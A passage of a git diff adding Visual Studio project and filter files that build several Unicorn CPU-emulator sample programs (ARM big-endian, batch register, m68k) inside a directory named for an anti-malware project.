b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64eb/sample_arm64eb.vcxproj.filters new file mode 100644 index 0000000..a5cdd84 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64eb/sample_arm64eb.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_arm64eb.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_armeb/sample_armeb.vcxproj 
b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_armeb/sample_armeb.vcxproj new file mode 100644 index 0000000..74d6844 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_armeb/sample_armeb.vcxproj @@ -0,0 +1,174 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{1945F27B-ABB3-47F9-9268-A42F73C8B992}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_armeb</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup 
Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" 
Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + 
<AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + 
<OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_armeb.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git 
a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_armeb/sample_armeb.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_armeb/sample_armeb.vcxproj.filters new file mode 100644 index 0000000..bdd745e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_armeb/sample_armeb.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_armeb.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_batch_reg/sample_batch_reg.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_batch_reg/sample_batch_reg.vcxproj new file mode 100644 index 0000000..a68048b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_batch_reg/sample_batch_reg.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{7AA02EDF-D797-494B-929C-F628F4E4EA62}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_batch_reg</RootNamespace> + </PropertyGroup> + <Import 
Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" 
Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + 
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + 
</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + 
<OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_batch_reg.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_batch_reg/sample_batch_reg.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_batch_reg/sample_batch_reg.vcxproj.filters new file mode 100644 index 0000000..098f833 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_batch_reg/sample_batch_reg.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_batch_reg.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_m68k/sample_m68k.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_m68k/sample_m68k.vcxproj new file mode 100644 index 0000000..26a2481 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_m68k/sample_m68k.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> 
+ </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_m68k.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{11727C54-463F-472A-88AF-6C3D6071BF0B}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_m68k</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + 
<UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + 
<IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + 
